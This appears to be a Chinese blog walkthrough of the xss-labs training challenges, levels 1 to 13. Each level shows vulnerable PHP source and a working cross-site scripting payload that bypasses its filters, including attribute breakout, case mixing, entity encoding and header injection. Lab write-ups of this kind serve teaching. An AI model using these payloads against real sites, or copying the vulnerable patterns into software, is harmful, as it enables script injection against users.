XSS(七)xsslab

最新推荐文章于 2025-04-07 13:20:53 发布
最新推荐文章于 2025-04-07 13:20:53 发布
阅读量210 收藏
点赞数 2
分类专栏: xss 文章标签: xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/shirlly_/article/details/137723816
版权

XSS(七)xsslab

level1

无过滤:name=<script>alert(/xss/)</script>

<?php 
ini_set("display_errors", 0);
$str = $_GET["name"];
echo "<h2 align=center>欢迎用户".$str."</h2>";
?>

level2

闭合:"><script>alert(/xss/)</script>

">onmouseover='alert(/xss/)

第一处在PHP代码块的echo中输出,第二处在表单input中输出,第
一处用htmlspeciachars()做了转义,第二处并没有做限制,闭合
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<input name=keyword  value="'.$str.'">

level3

闭合: onmouseover='alert(/xss/)

将两个输出点都做了htmlspecialchars()转义,那既然做了转义那么双引号和尖括号就没有效果了,但是单引号在这个函数中如果没做特殊的改动,默认是可以出效果的,而且源码中的value是用单引号,看来是有意让使用单引号。
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>"."<center>
<form action=level3.php method=GET>
<input name=keyword  value='onmouseover='alert(/xss/)'>  (onmouseover:事件)

level4

" onmouseover="alert(/xss/)

这里的俩个输出点,一个被转义,另外一个将尖括号替换为空
$str = $_GET["keyword"];
$str2=str_replace(">","",$str);
$str3=str_replace("<","",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level4.php method=GET>
<input name=keyword  value="'.$str3.'">

level5

"><a href="javascript:alert:alert(/xss/)">xss</a>

将<script和on进行了替换
$str = strtolower($_GET["keyword"]);
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level5.php method=GET>
<input name=keyword  value="'.$str3.'">

level6

大小写绕过:"><sCript>alert(/xss/)</sCript>

level7

将特殊字符替换成空字符,这样可以采用补充撮合的方法达到XSS攻击效果。
" oonnmouseover="alert(/xss/)
"><scscriptript>alert(/xss/)</scscriptript>

level8

将字符转换为小写,然后过滤特殊字符和双引号,加了一个转义函数输出,,代码处的添加友情链接是
突破点,在input框中输入字符提交之后,在友情链接处会载入一个拼接后的a标签,因为javascript被过滤对其进行编码绕过再点击友情链接即可。
java&#x73;cript:alert(/xss/)

$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level8.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
 echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
?>

level9

这次在上一题的基础上加入了strpos()函数,查找如果url中找到'http'那么会返回找
到位置的位数,自然不会返回0也就不会等于false,那么就可以绕过限制了,但是为什么会
这么做呢?回想了下,应该是让输入框必须要输入合法的URL即带有http的字符串,那么
可以向输入框加进去就可以绕过了。

java&#x73;cript:alert(’http:/baidu.com')//http://

level10


&t_sort=xss" onmouseover=alert(/xss/) type="text"
这道题有俩个输出的地方,第一个被实体化过滤,第二个是隐藏表单的"t_sort"参数
即'$str33',过滤了尖括号,那么就在input标签中触发xss即可,可以用onmouseover或者
是onclick,需要将隐藏表单显示出来触发:
$str = $_GET["keyword"];
$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.$str33.'" type="hidden">

level11

Referer: " onmouseover=alert(/xss/) type="text
hidden隐藏了表单,str与str00都被做了转义,可以对输出的$str33写xss语句,
burp抓包改referer即可

level12

同上题原理,改user-agent就可以了
User-Agent:" onclick=alert(/xss/) type="text

level13

同上,改cookie中的user即可
 " onfocus=alert(/xss/) type="text

level14
基于micropython的st7735s驱动
supermodule的博客
01-21 2553
基于micropython esp32开发st7735s驱动代码
Arduino环境下ESP32+1.8'128X160 RGB_TFT(ST7735S)三种库的配置及示例程序效果
热门推荐
大头工程师笔记
03-23 2万+
1.硬件信息 1.1.屏幕 分辨率:128X160 Driver IC:ST7735S 1.2.主控ESP32引脚图 2.Ucglib库示例代码 2.1.SPI接线定义 ESP32 IO TFT 说明 VIN VIN VIN VIN GND GND GND GND D22 22 SCL 时钟线 D21 21 SDA 数据线 D25 25 RST 复位线 D14...
1.44寸 TFT屏幕的代码(芯片是ST7735S
08-21
资源是有关1.44寸的TFT屏幕的操作代码,驱动芯片是ST7735S,使用的是非标准SPI协议;
ST7735驱动实现(1.44寸TFT)基于STM32F103标准库
最新发布
2301_79723544的博客
04-07 402
实现字符串显示,图片显示功能,采用硬件spi
ST7735S彩屏 SPI驱动代码( msp430)
11-21
本代码采用SPI驱动,为自己做项目时整理,用该屏做简单的UI界面,LCD驱动部分有详细讲解,希望对有用的人能有些帮助。 支持中英文、位图显示(电量,信号灯简单图形),字库均自己制作;支持横屏和竖屏。该代码仅供学习参考。
ST7735S应用笔记
记录学习
03-14 2万+
ST7735S是一块1.8英寸采用SPI通信的TFT全彩屏,分辨率是128*160,这里采用RGB565 16bit的色块编译模式。本文仅设计该屏幕的简单应用,不对底层原理进行深究。
ST7735S_initial_code.c TFT驱动程序
03-29
ST7735S_initial_code.cTFT驱动程序 ST7735S_initial_code.cTFT驱动程序
【快速上手STM32】SPI通信协议&&1.8寸TFT-LCD(ST7735S
m0_63235356的博客
04-16 1万+
SPI,英文全称Serial Peripheral Interface,即串行外围设备接口,是一种高速、全双工、同步的串行通信总线。我们之前说过I2C,那么我们就拿I2C和SPI做个对比。SPI和I2C对比,优势在于SPI的传输速率比I2C快得多,劣势在于SPI需要用的通信线比较多。
1.44寸资料ST7735S的资料+红.zip_ST7735 1.44 pdf_ST7735S 1.44_st7735_st77
07-15
4. **驱动代码**:可能包含示例代码或库函数,帮助开发者快速实现与ST7735S的软件交互。 5. **用户指南**:指导用户如何设置和配置ST7735S,以及如何使用其各项功能。 在使用ST7735S时,开发者需要注意以下几点: 1...
06中景园电子高清0.96与1.3寸IPS彩色显示屏资料_1.3寸IPS彩色显示屏资料_st7735s0.96亮度_
10-03
ST7735S是一款专为小型TFT LCD显示屏设计的驱动芯片。它包含了显示控制器、电源管理、时序控制等功能,能够支持多种分辨率和显示模式。对于0.96英寸的显示屏,ST7735S能确保高清晰度和鲜艳的色彩表现。同时,亮度...
ST7735S芯片手册.pdf
04-26
ST7735S芯片手册,找了好久才找到。 132RGB x 162dot 262K Color with Frame Memory Single-Chip TFT ontroller/Drive
51驱动ST7735S
04-15
51单片机驱动ST7735S51的代码,个人向_ST7735S_CTC177 4-wire
STM32F030R8-ST7735S驱动程序
07-29
ST77 35是一种用于262K颜色的单片控制器/驱动器,即图形型TFT-LCD。它由396个源极线和162个门线驱动电路组成。接受串行外围接口(SPI)、8位/9位/ 16位/ 18位并行接口。显示数据可存储在132×162×x 18位的片上显示数据RAM中。H~(NO)外运算 将功率消耗降至最小,即,由于“集成”电源供应电路的必要性,即“驱动”液体晶体,它是可能的,从而成为一个具有较少成分的显示系统。
ST7735S_init
08-26
ST7735S驱动 ST7735S 160x128 彩屏驱动代码
ST7735sS_SPEC
09-13
ST7735S_SPEC规格书,包括代码,指令,原理图ST7735S_SPEC规格书,包括代码,指令,原理图ST7735S_SPEC规格书,包括代码,指令,原理图
华芯微特 SWM19SCBT7-50驱动TFT-LCD应用
07-15
在分析华芯微特SW19SCBT7-50驱动TFT-LCD应用时,首先要提到的是,这个应用笔记涉及到的SWM19SCBT7-50是一款微控制器(MCU),它是华芯微特推出的一款基于ARM Cortex-M0核心的产品。ARM Cortex-M0是目前世界上应用最...
1.8TFT显示屏ST7735S SPI接口使用指南
ST7735S是STMicroelectronics(意法半导体)生产的一款彩色TFT-LCD控制器驱动IC,常用于驱动1.8英寸或更小尺寸的TFT显示屏。它集成了高速SPI接口,允许快速的通信和数据传输,对于希望在较小尺寸上实现高分辨率和...
硬件SPI+DMA驱动0.96寸ST7735S(含代码)
abc565846881的博客
01-10 3402
前段时间做了一个软件模拟SPI驱动ST7735S的0.96寸彩屏,但是觉得屏幕的刷新率不太够用,于是打算改用硬件SPI+DMA的方式。具体ST7735S的底层逻辑以及如何根据数据手册设计底层驱动我前面的文章有讲解,感兴趣的可以先去看一下更好理解。
ImportError: cannot import name 'Protocol' from 'typing' (D:\LenovoSoftstore\Install\Anaconda3\envs\RL\lib\typing.py)
09-01
出现这个错误的原因是在导入seaborn包时,无法从typing模块中导入名为'Protocol'的对象。 解决这个问题的方法有以下几种: 1. 检查你的Python版本是否符合seaborn包的要求,如果不符合,尝试更新Python版本。 2. 检查你的环境中是否安装了typing_extensions包,如果没有安装,可以使用以下命令安装:pip install typing_extensions。 3. 如果你使用的是Python 3.8版本以下的版本,你可以尝试使用typing_extensions包来代替typing模块来解决该问题。 4. 检查你的代码是否正确导入了seaborn包,并且没有其他导入错误。 5. 如果以上方法都无法解决问题,可以尝试在你的代码中使用其他的可替代包或者更新seaborn包的版本来解决该问题。 总结: 出现ImportError: cannot import name 'Protocol' from 'typing'错误的原因可能是由于Python版本不兼容、缺少typing_extensions包或者导入错误等原因造成的。可以根据具体情况尝试上述方法来解决该问题。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [ImportError: cannot import name ‘Literal‘ from ‘typing‘ (D:\Anaconda\envs\tensorflow\lib\typing....](https://blog.youkuaiyun.com/yuhaix/article/details/124528628)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值